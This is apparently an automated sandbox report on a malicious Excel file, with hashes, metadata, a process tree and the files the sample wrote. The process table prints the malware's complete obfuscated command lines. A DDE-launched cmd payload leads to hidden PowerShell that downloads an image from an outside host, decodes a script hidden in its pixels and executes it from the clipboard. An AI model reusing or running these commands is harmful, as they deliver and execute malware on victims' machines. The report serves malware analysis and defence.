File name: | f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371.xls |
Full analysis: | https://app.any.run/tasks/f454a676-9c84-47df-873b-3ca846a61ec6 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 14:50:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 30 09:35:12 2018, Last Saved Time/Date: Tue Oct 30 09:47:20 2018, Security: 0 |
MD5: | E5C72950358CB38B8A36223EE60B4635 |
SHA1: | CA26736F25E38FDD30F35797124AC09B4A55A119 |
SHA256: | F39618FBDBB3788FA9444C84522A069B867E3237567DDD722F5E9A42838A4371 |
SSDEEP: | 1536:6dEgS4vhBHVUCKYJhMRCunLjKbx1+II3OwZ1nxscjOhL:7gS4vhSYBeLOb59QXj |
.xls | Microsoft Excel sheet (48)
---|---
.xls | Microsoft Excel sheet (alternate) (39.2)
Author: | - |
---|---|
LastModifiedBy: | - |
Software: | Microsoft Excel |
CreateDate: | 2018:10:30 09:35:12 |
ModifyDate: | 2018:10:30 09:47:20 |
Security: | None |
CodePage: | Unicode (UTF-8) |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: | |
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2004 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 | | | |
4076 | cmd /V:ON/C"set d0=rMc5( ""Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,59,65,60,55,65,60,17,65,7,29,20,48,83,78,19,29,14,46,9,78,48,37,48,2,48,37,48,79,48,81,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,29,35,54,23,78,48,37,48,51,27,27,48,81,5,29,51,47,47,78,32,46,31,54,83,70,32,78,5,4,7,60,59,65,60,17,65,60,39,65,60,55,65,60,40,65,7,5,29,20,48,72,54,48,37,48,0,70,19,22,48,37,48,47,48,37,48,79,78,32,82,61,48,37,48,33,34,48,81,62,10,60,34,65,21,75,75,75,67,4,48,70,48,81,5,4,7,60,40,65,60,55,65,60,39,65,60,17,65,60,59,65,7,29,20,5,48,23,48,37,48,79,78,32,82,61,0,70,48,37,48,34,82,43,22,79,32,70,48,37,48,19,22,33,48,37,48,72,54,47,48,81,4,4,82,4,48,70,48,81,5,4,7,60,17,65,60,59,65,60,55,65,7,29,20,5,48,31,22,78,33,48,37,48,79,48,37,48,83,78,79,82,73,78,46,25,48,81,81,82,4,7,60,55,65,60,59,65,7,5,29,20,48,78,33,36,78,70,27,48,37,48,14,23,48,81,82,28,33,53,49,30,78,4,4,7,60,59,65,60,17,65,60,39,65,60,74,65,60,3,65,60,55,65,60,40,65,7,5,29,20,5,48,11,79,48,37,48,78,82,22,46,46,82,2,49,41,9,0,61,13,53,59,41,11,23,82,23,33,48,37,48,79,23,47,64,41,48,37,48,41,22
,32,48,37,48,34,48,37,48,34,48,37,48,70,48,81,81,81,62,10,60,49,65,21,82,4,48,70,48,81,5,4,7,60,59,65,60,55,65,7,5,29,20,48,43,54,48,37,48,79,78,56,44,48,81,5,40,76,74,59,62,4,59,82,82,24,81,75,75,75,42,75,75,75,67,4,48,50,48,81,60,20,49,0,78,70,2,11,4,10,60,68,65,5,22,33,4,59,82,82,74,55,76,81,81,60,10,60,71,65,21,10,60,26,65,82,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,78,31,48,37,48,22,68,48,37,48,26,78,79,71,48,81,82,28,33,53,49,30,78,4,10,60,52,65,37,10,60,58,65,81,62,10,60,14,65,56,10,60,58,65,66,74,17,59,63,10,60,52,65,44,21,4,5,4,82,4,7,60,17,65,60,59,65,60,55,65,7,29,20,48,0,28,51,43,48,37,48,31,78,48,37,48,57,51,48,81,5,5,4,7,60,55,65,60,59,65,7,29,20,48,27,26,48,37,48,17,48,81,5,29,57,70,45,16,78,49,83,31,15,5,81,64,64,4,7,60,55,65,60,59,65,7,29,20,48,31,49,49,0,48,37,48,8,48,81,82,28,33,53,49,30,78,4,4,10,60,23,65,82,7,43,7,29,46,70,33,27,55,3,81,66,55,74,81,29,46,49,0,4,10,60,71,65,82,7,26,7,5,29,46,70,33,27,5,55,3,81,81,65,65,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,52,48,37,48,28,12,48,81,4,5,4,75,75,75,67,4,7,60,59,65,60,55,65,60,17,65,60,39,65,7,29,20,5,48,26,48,37,48,78,79,29,53,51,48,37,48,0,28,48,37,48,51,43,31,12,48,81,5,4,7,60,59,65,60,55,65,7,29,20,48,61,26,48,37,48,83,53,48,81,5,29,53,51,31,18,78,49,5,5,81,64,64,7,70,72,25,77,22,28,7,82,7,34,78,79,72,77,35,0,77,28,83,34,7,4,10,60,49,65,56,59,82,82,40,24,39,17,44,81,81,42,25,45,22,23,5,67,67,2,32,27,5,41,25,5,23,49,19,78,36,47,38,78,45,45,5,5,29,83,49,31,14,26,5,29,78,52,12,25,16,35,5,43,54,71,70,72,72,5,29,72,35,5,5,29,33,49,71,36,49,8,5,29,19,22,5,11,22,5,5,29,83,14,83,22,83,79,78,5,5,5,5,5,75,75,75,67,5,5,4,69,7,60,17,65,60,59,65,60,55,65,69,7,5,29,20,5,48,29,35,48,37,48,54,23,78,48,37,48,51,27,27,48,5,81,5,29,51,47,47,78,32,5,4,5,5,69,7,60,39,65,60,40,65,60,59,65,60,55,65,60,17,65,69,7,29,20,5,48,49,48,37,48,33,25,49,48,37,48,0,78,48,37,48,71,48,37,4,5,69,7,60,59,65,60,55,65,60,17,65,69,7,29,20,48,0,78,48,37,48,47,78,33,79,70,48,37,48,79,22,48,5,5,81,81,5,5,62,5,5,5,5,5,82,4,5,5,69,7
,60,39,65,60,17,65,60,55,65,60,59,65,69,7,29,20,5,4,5,5,69,7,60,59,65,60,55,65,69,7,5,29,20,5,48,72,28,48,37,48,14,33,48,81,37,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,48,78,47,48,37,48,68,71,0,48,5,81,37,48,78,48,37,4,5,69,7,60,59,65,60,55,65,69,7,5,29,20,48,28,48,37,48,83,53,14,30,78,29,48,81,5,5,81,5,4,5,5,4,5,56,19,22,83,61,49,19,72,82,25,45,22,23,43,49,51,0,61,44,64,64,4,69,7,60,55,65,60,59,65,69,7,5,29,20,48,52,79,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,35,78,48,37,48,26,78,35,48,81,5,81,82,69,7,28,33,77,57,49,80,12,69,7,4,5,5,81,5,81,5,81,5,5,5,62,56,73,22,33,27,49,19,47,82,25,31,22,23,46,49,70,0,27,44,64,64,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,5,48,0,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,31,78,70,48,37,48,25,48,5,5,81,5,81,82,69,7,22,77,83,57,49,80,78,69,7,4,5,5,81,90)do set hoR=!hoR!!d0:~%x,1!&&if %x==90 cmd /C!hoR:*hoR!=!" | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 4294770688; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3400 | cmd /CEchO ^^^&("{2}{1}{0}" -f 'EM','IT','SET-') ("{1}{2}{0}" -f'2dG','vA','riable:') ( [TyPE]("{0}{1}"-F 'MAT','H') ); .("{0}{1}{2}" -f 'sE','t-','itEM') ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA') ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (^^^&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))|CLip &&cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^^^& (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 4294770688; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
912 | C:\Windows\system32\cmd.exe /S /D /c" EchO ^&("{2}{1}{0}" -f 'EM','IT','SET-') ("{1}{2}{0}" -f'2dG','vA','riable:') ( [TyPE]("{0}{1}"-F 'MAT','H') ); .("{0}{1}{2}" -f 'sE','t-','itEM') ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA') ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (^&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3956 | CLip | C:\Windows\system32\clip.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Clip - copies the data into clipboard; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2320 | cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 4294770688; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2980 | poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 4294770688; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
PID | Process | Filename | Type | |
---|---|---|---|---|
2004 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA10E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MLMJLD183E8RIXCGM7LI.temp | — | |
MD5:— | SHA256:— | |||
2004 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48490406.emf | emf | |
MD5:050B6BD9847D381A0D0F275B83B41B5F | SHA256:8650B0FA7D292FC367ED676A3D69A9CC41377D7B9D1DAD700D9CF144680CAC1A | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db263.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |